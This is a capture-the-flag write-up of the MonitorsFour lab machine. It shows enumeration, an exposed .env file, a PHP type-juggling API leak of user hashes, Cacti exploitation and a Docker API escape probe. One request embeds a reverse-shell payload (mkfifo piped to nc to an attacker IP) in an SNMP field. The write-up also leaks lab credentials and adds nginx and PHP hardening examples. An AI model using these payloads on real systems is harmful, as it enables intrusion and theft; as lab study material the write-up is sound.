# 1. Discovery and Enumeration
Immediately tried to connect to IP 10.129.16.60 -> got monitorsfour.htb, which I added to /etc/hosts.
## Discovery
rustscan -a monitorsfour.htb --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.16.60:80
Open 10.129.16.60:5985
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-15 19:52 WET
Initiating Ping Scan at 19:52
Scanning 10.129.16.60 [4 ports]
Completed Ping Scan at 19:52, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:52
Scanning monitorsfour.htb (10.129.16.60) [2 ports]
Discovered open port 80/tcp on 10.129.16.60
Discovered open port 5985/tcp on 10.129.16.60
Completed SYN Stealth Scan at 19:52, 0.08s elapsed (2 total ports)
Nmap scan report for monitorsfour.htb (10.129.16.60)
Host is up, received echo-reply ttl 127 (0.040s latency).
Scanned at 2025-12-15 19:52:54 WET for 0s
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
## Running nmap scripts on 80 and 5985
sudo nmap -p80,5985 -sS -sC -sV monitorsfour.htb -T5 --vv
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-15 19:53 WET
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating Ping Scan at 19:53
Scanning monitorsfour.htb (10.129.16.60) [4 ports]
Completed Ping Scan at 19:53, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:53
Scanning monitorsfour.htb (10.129.16.60) [2 ports]
Discovered open port 80/tcp on 10.129.16.60
Discovered open port 5985/tcp on 10.129.16.60
Completed SYN Stealth Scan at 19:53, 0.06s elapsed (2 total ports)
Initiating Service scan at 19:53
Scanning 2 services on monitorsfour.htb (10.129.16.60)
Completed Service scan at 19:53, 6.24s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.16.60.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 5.07s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Nmap scan report for monitorsfour.htb (10.129.16.60)
Host is up, received echo-reply ttl 127 (0.038s latency).
Scanned at 2025-12-15 19:53:35 WET for 12s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 nginx
|_http-favicon: Unknown favicon MD5: 889DCABDC39A9126364F6A675AA4167D
|_http-title: MonitorsFour - Networking Solutions
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.24 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
# 2. Port 80
- I will first enumerate endpoints and vhosts using ffuf.
ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:FUZZ -u http://monitorsfour.htb/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2217ms]
contact [Status: 200, Size: 367, Words: 34, Lines: 5, Duration: 2213ms]
# [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2217ms]
# Priority ordered case insensative list, where entries were found [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2209ms]
[Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2209ms]
# [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2210ms]
# [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2210ms]
# Copyright 2007 James Fisher [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2211ms]
# directory-list-lowercase-2.3-medium.txt [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2214ms]
# on atleast 2 different hosts [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2221ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2230ms]
# [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2212ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2212ms]
login [Status: 200, Size: 4340, Words: 1342, Lines: 96, Duration: 114ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 84ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 84ms]
user [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 90ms]
static [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 40ms]
views [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 42ms]
forgot-password [Status: 200, Size: 3099, Words: 164, Lines: 84, Duration: 195ms]
[Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 180ms]
controllers [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 46ms]
ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:FUZZ -u http://monitorsfour.htb/.FUZZ
:: Method : GET
:: URL : http://monitorsfour.htb/.FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
html [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 39ms]
http [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 155ms]
htdocs [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 42ms]
htm [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 248ms]
ht [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 76ms]
httpd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 192ms]
htmlcrypto [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 39ms]
httptype [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 48ms]
env [Status: 200, Size: 97, Words: 1, Lines: 6, Duration: 222ms]
htmls [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 98ms]
htc [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 126ms]
htbin [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 41ms]
htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 40ms]
ht_flag [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 208ms]
htdig [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 40ms]
html401 [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 42ms]
http%3a%2f%2fwww [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 41ms]
htmlhelp [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 40ms]
https [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 42ms]
httpd-2 [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 41ms]
httptunnel [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 150ms]
html_wrap [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 40ms]
http_request [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 399ms]
html4 [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 40ms]
html_files [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 41ms]
http%3a [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 47ms]
htmled [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 204ms]
htww [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 42ms]
html-editors [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 46ms]
There is a .env here that contains:
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
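Note what the dotfile scan above shows: every `.ht*` path returned 403 (so a deny rule for `/.ht` exists) while `.env` returned 200 with database credentials, because the rule was written for Apache-style files only. As an added mitigation example (my own config, not the box's nginx configuration; the `root`, socket path and PHP-FPM version are assumptions), the fix is to keep secrets outside the document root and to refuse every dot-path, not just `.ht*`:

```nginx
# Added example, not the MonitorsFour deployment's config.
server {
    listen 80;
    server_name monitorsfour.htb;

    # Assumed layout: only the public directory is served, so a file such as
    # /var/www/app/.env is not reachable by URL in the first place.
    root /var/www/app/public;
    index index.php;

    # Belt and braces: refuse any path component beginning with a dot
    # (.env, .git, .htaccess, ...), at any depth. The lookahead keeps
    # /.well-known/ reachable for ACME. return 404 (rather than deny all)
    # keeps the response indistinguishable from a missing file.
    location ~ /\.(?!well-known/) {
        return 404;
        access_log off;
        log_not_found off;
    }

    location / {
        try_files $uri $uri/ /index.php?$query_string;
    }

    location ~ \.php$ {
        include fastcgi_params;
        fastcgi_pass unix:/run/php/php8.3-fpm.sock;   # assumed socket path
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    }
}
```

After reloading nginx, the same `ffuf ... -u http://monitorsfour.htb/.FUZZ` run should show 404 for every entry, including `env`; any 200 left is a file that still lives inside the web root and should be moved.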
## VHost
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://monitorsfour.htb/ -H 'Host: FUZZ.monitorsfour.htb' -fs 138
:: Method : GET
:: URL : http://monitorsfour.htb/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.monitorsfour.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 138
________________________________________________
cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3478ms]
:: Progress: [4989/4989] :: Job [1/1] :: 433 req/sec :: Duration: [0:00:13] :: Errors: 0 ::
Let's add cacti.monitorsfour.htb to /etc/hosts.
This is Cacti version 1.2.28, which has the following vulnerability: https://pt.linkedin.com/posts/wfscybersecurity_cve-2025-66399-cvss-87-vulnerabilidade-activity-7402784383721439232-zHPr https://github.com/Cacti/cacti/security/advisories/GHSA-c7rr-2h93-7gjf
But for this I believe we need to be authenticated.
## monitorsfour.htb
Interacting with the website using the browser and Caido, we can see an API request to /api/v1/X. It does not hurt to enumerate it as well.
ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:FUZZ -u http://monitorsfour.htb/api/v1/FUZZ
:: Method : GET
:: URL : http://monitorsfour.htb/api/v1/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
user [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 73ms]
users [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 249ms]
logout [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 89ms]
auth [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 337ms]
reset [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 76ms]
A 405 error most likely means the endpoint expects POST; the others give this response:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Dec 2025 20:40:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/8.3.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 35
{
"error": "Missing token parameter"
}
PHP might be vulnerable to loose comparison, meaning it converts the operands to matching types before comparing them, and that can lead to data leaks? https://secops.group/php-type-juggling-simplified/
GET /api/v1/users?token=0 HTTP/1.1
Host: monitorsfour.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b24babbe8bf2958f23e5616fe48457a3
## Response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Dec 2025 21:08:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/8.3.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1113
[{
"id": 2,
"username": "admin",
"email": "admin@monitorsfour.htb",
"password": "56b32eb43e6f15395f6c46c1c9e1cd36",
"role": "super user",
"token": "8024b78f83f102da4f",
"name": "Marcus Higgins",
"position": "System Administrator",
"dob": "1978-04-26",
"start_date": "2021-01-12",
"salary": "320800.00"
}, {
"id": 5,
"username": "mwatson",
"email": "mwatson@monitorsfour.htb",
"password": "69196959c16b26ef00b77d82cf6eb169",
"role": "user",
"token": "0e543210987654321",
"name": "Michael Watson",
"position": "Website Administrator",
"dob": "1985-02-15",
"start_date": "2021-05-11",
"salary": "75000.00"
}, {
"id": 6,
"username": "janderson",
"email": "janderson@monitorsfour.htb",
"password": "2a22dcf99190c322d974c8df5ba3256b",
"role": "user",
"token": "0e999999999999999",
"name": "Jennifer Anderson",
"position": "Network Engineer",
"dob": "1990-07-16",
"start_date": "2021-06-20",
"salary": "68000.00"
}, {
"id": 7,
"username": "dthompson",
"email": "dthompson@monitorsfour.htb",
"password": "8d4a7e7fd08555133e056d9aacb1e519",
"role": "user",
"token": "0e111111111111111",
"name": "David Thompson",
"position": "Database Manager",
"dob": "1982-11-23",
"start_date": "2022-09-15",
"salary": "83000.00"
}]
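To show the mechanism behind the `?token=0` request above, here is an added example (my own code, not the MonitorsFour application's): a token lookup written with `==` next to the same lookup written with `hash_equals()`. The user list is constructed from the `token` values in the response above; the function names are hypothetical.

```php
<?php
// Added example: loose vs strict token comparison. Not the application's code.
// Sample users constructed from the token values returned by /api/v1/users above.
$users = [
    ['username' => 'admin',     'token' => '8024b78f83f102da4f'],
    ['username' => 'mwatson',   'token' => '0e543210987654321'],
    ['username' => 'janderson', 'token' => '0e999999999999999'],
    ['username' => 'dthompson', 'token' => '0e111111111111111'],
];

// Vulnerable pattern (hypothetical helper name). With `==`, two numeric strings are
// compared as numbers, and "0e543210987654321" is scientific notation for zero,
// so the supplied "0" matches every token of the form 0e<digits>.
// "8024b78f83f102da4f" is not a numeric string, so it is compared as text and does not match.
function findUsersLoose(array $users, string $token): array
{
    return array_values(array_filter($users, fn($u) => $u['token'] == $token));
}

// Hardened pattern: hash_equals() compares byte-for-byte in constant time and never
// coerces types, so only an exact token value matches.
function findUsersStrict(array $users, string $token): array
{
    return array_values(array_filter($users, fn($u) => hash_equals($u['token'], $token)));
}

// $_GET['token'] arrives as the string "0"; constructed input, same as the request above.
$supplied = '0';

$loose  = array_column(findUsersLoose($users, $supplied), 'username');
$strict = array_column(findUsersStrict($users, $supplied), 'username');

echo "loose  == : " . (implode(', ', $loose) ?: '(no match)') . PHP_EOL;
echo "hash_equals: " . (implode(', ', $strict) ?: '(no match)') . PHP_EOL;
```

Run with `php example.php`: the `==` lookup returns mwatson, janderson and dthompson for a token of `0`, while the `hash_equals()` lookup returns nothing. Two further points for whoever owns such an API: tokens should come from `random_bytes()` rather than a short hex value that can happen to be numeric, and an endpoint should never return password hashes or other users' tokens in its response, whatever the comparison logic.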
Not the hardest, to be honest. The hashes seem to be MD5, so it is a matter of trying to crack them on CrackStation:
| Hash | Type | Plaintext |
|---|---|---|
| 56b32eb43e6f15395f6c46c1c9e1cd36 | md5 | wonderful1 |
| 69196959c16b26ef00b77d82cf6eb169 | Unknown | Not found. |
| 2a22dcf99190c322d974c8df5ba3256b | Unknown | Not found. |
admin:wonderful1 works on the normal login but not on Cacti. Also trying marcus and mhiggins.
Marcus worked!
Now let's try the RCE from above!
POST /cacti/host.php?header=false HTTP/1.1
Host: cacti.monitorsfour.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: http://cacti.monitorsfour.htb/cacti/host.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Cacti=23737e5a42f0945052db05e32b0b1ea4; CactiTimeZone=0; cacti_remembers=4%2C0%2C8f743ba86e3597a47e4281bd0a63e1553b1412753f475cc969c37231dd6eaea2; CactiDateTime=Mon Dec 15 2025 21:18:18 GMT+0000 (Western European Standard Time)
__csrf_magic= &description=Exploit&hostname=cacti.monitorsfour.htb&location=&poller_id=1&site_id=1&host_template_id=0&device_threads=1&snmp_version=2&snmp_community=public%0arm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.15.64%202314%20%3E%2Ftmp%2Ff&snmp_security_level=authPriv&snmp_auth_protocol=MD5&snmp_username=&snmp_password=&snmp_password_confirm=&snmp_priv_protocol=DES&snmp_priv_passphrase=&snmp_priv_passphrase_confirm=&snmp_context=&snmp_engine_id=&snmp_port=161&snmp_timeout=500&max_oids=10&bulk_walk_size=0&availability_method=2&ping_method=1&ping_port=23&ping_timeout=400&ping_retries=1&notes=&external_id=&id=3&save_component_host=1&graph_template_id=297&snmp_query_id=2&reindex_method=1&action=save
Unfortunately this did not work.
After some research I also found https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC, which says that the graph visualizer has an input-sanitization issue around rrdtool.
python3 exploit.py -u marcus -p wonderful1 -i 10.10.15.64 -l 2314 -url http://cacti.monitorsfour.htb
[+] Cacti Instance Found!
[+] Serving HTTP on port 80
[+] Login Successful!
[+] Got graph ID: 226
[i] Created PHP filename: AzgNC.php
[+] Got payload: /bash
[i] Created PHP filename: 6044v.php
[+] Hit timeout, looks good for shell, check your listener!
[+] Stopped HTTP server on port 80
I will not humiliate myself by telling you the amount of time I spent on the previous CVE, even though I still believe it might work.
# 3. RCE
Looking around on the machine:
www-data@821fbd6a43fa:~/html/cacti$ whoami
whoami
www-data
www-data@821fbd6a43fa:~/html/cacti$ id -a
id -a
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@821fbd6a43fa:~/html/cacti$ uname -a
uname -a
Linux 821fbd6a43fa 6.6.87.2-microsoft-standard-WSL2 #1 SMP PREEMPT_DYNAMIC Thu Jun 5 18:30:46 UTC 2025 x86_64 GNU/Linux
www-data@821fbd6a43fa:~/html/cacti$ mount
mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/367/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/364/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/363/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/362/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/361/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/360/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/359/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/358/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/331/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/330/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/196/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/195/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/194/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/193/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/192/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/191/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/190/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/189/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/188/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/187/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/186/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/185/fs,upperdir=/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/368/fs,workdir=/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/368/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup type cgroup2 (ro,nosuid,nodev,noexec,relatime)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/sde on /etc/resolv.conf type ext4 (rw,relatime)
/dev/sde on /etc/hostname type ext4 (rw,relatime)
/dev/sde on /etc/hosts type ext4 (rw,relatime)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/acpi type tmpfs (ro,relatime)
tmpfs on /proc/interrupts type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/latency_stats type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/scsi type tmpfs (ro,relatime)
tmpfs on /sys/firmware type tmpfs (ro,relatime)
We are inside a container, because the machine is certainly Windows.
It is also possible to see marcus here, and we can access the flag directly: a83980b9dbf8f2e4d321fb3bc131b5e4
## Linpeas promising entries
╔══════════╣ Unexpected in root
/.dockerenv
/start.sh
══════════╣ Log files with potentially weak perms (limit 50)
159653 64 -rw-r----- 1 root adm 62854 Nov 10 16:12 /var/log/apt/term.log
159658 0 -rw-r----- 1 www-data adm 0 Nov 10 16:11 /var/log/nginx/error.log
159657 0 -rw-r----- 1 www-data adm 0 Nov 10 16:11 /var/log/nginx/access.log
╔══════════╣ Analyzing Env Files (limit 70)
-rwxr-xr-x 1 www-data www-data 97 Sep 13 05:37 /var/www/app/.env
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
╔══════════╣ Analyzing Cacti Files (limit 70)
drwxr-xr-x 1 www-data www-data 4096 Dec 15 21:52 /var/www/html/cacti
-rwxr-xr-x 1 www-data www-data 7159 Sep 13 05:38 /var/www/html/cacti/include/config.php
$database_type = 'mysql';
$database_default = 'cacti';
$database_username = 'cactidbuser';
$database_password = '7pyrf6ly8qx4';
I tried all the passwords on root and marcus…
Might need to look directly at Docker escaping, since I cannot connect to the DB either.
ip a
ip route
# This IP is the third one... let's ping sweep
for i in $(seq 254); do ping 172.18.0.$i -c1 -W1 & done | grep from
## Machine does not have ping
- Capabilities seem fine.
- Cannot ls /proc/1/root.
cat /etc/resolv.conf
cat /etc/resolv.conf
# Generated by Docker Engine.
# This file can be edited; Docker Engine will not make further changes once it
# has been modified.
nameserver 127.0.0.11
options ndots:0
# Based on host file: '/etc/resolv.conf' (internal resolver)
# ExtServers: [host(192.168.65.7)]
# Overrides: []
# Option ndots from: internal
I read somewhere about a flaw in this: https://pvotal.tech/breaking-dockers-isolation-using-docker-cve-2025-9074/
curl http://192.168.65.7:2375/images/json
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2375 0 2375 0 0 14191 0 --:--:-- --:--:-- --:--:-- 14136
[
{"Containers":1,"Created":1762794130,"Id":"sha256:93b5d01a98de324793eae1d5960bf536402613fd5289eb041bac2c9337bc7666","Labels":{"com.docker.compose.project":"docker_setup","com.docker.compose.service":"nginx-php","com.docker.compose.version":"2.39.1"},
"ParentId":"","Descriptor":{"mediaType":"application/vnd.oci.image.index.v1+json","digest":"sha256:93b5d01a98de324793eae1d5960bf536402613fd5289eb041bac2c9337bc7666","size":856},"RepoDigests":["docker_setup-nginx-php@sha256:93b5d01a98de324793eae1d5960bf536402613fd5289eb041bac2c9337bc7666"],"RepoTags":["docker_setup-nginx-php:latest"],"SharedSize":-1,"Size":1277167255},{"Containers":1,"Created":1762791053,"Id":"sha256:74ffe0cfb45116e41fb302d0f680e014bf028ab2308ada6446931db8f55dfd40","Labels":{"com.docker.compose.project":"docker_setup","com.docker.compose.service":"mariadb","com.docker.compose.version":"2.39.1","org.opencontainers.image.authors":"MariaDB Community","org.opencontainers.image.base.name":"docker.io/library/ubuntu:noble","org.opencontainers.image.description":"MariaDB Database for relational SQL","org.opencontainers.image.documentation":"https://hub.docker.com/_/mariadb/","org.opencontainers.image.licenses":"GPL-2.0","org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.source":"https://github.com/MariaDB/mariadb-docker","org.opencontainers.image.title":"MariaDB Database","org.opencontainers.image.url":"https://github.com/MariaDB/mariadb-docker","org.opencontainers.image.vendor":"MariaDB 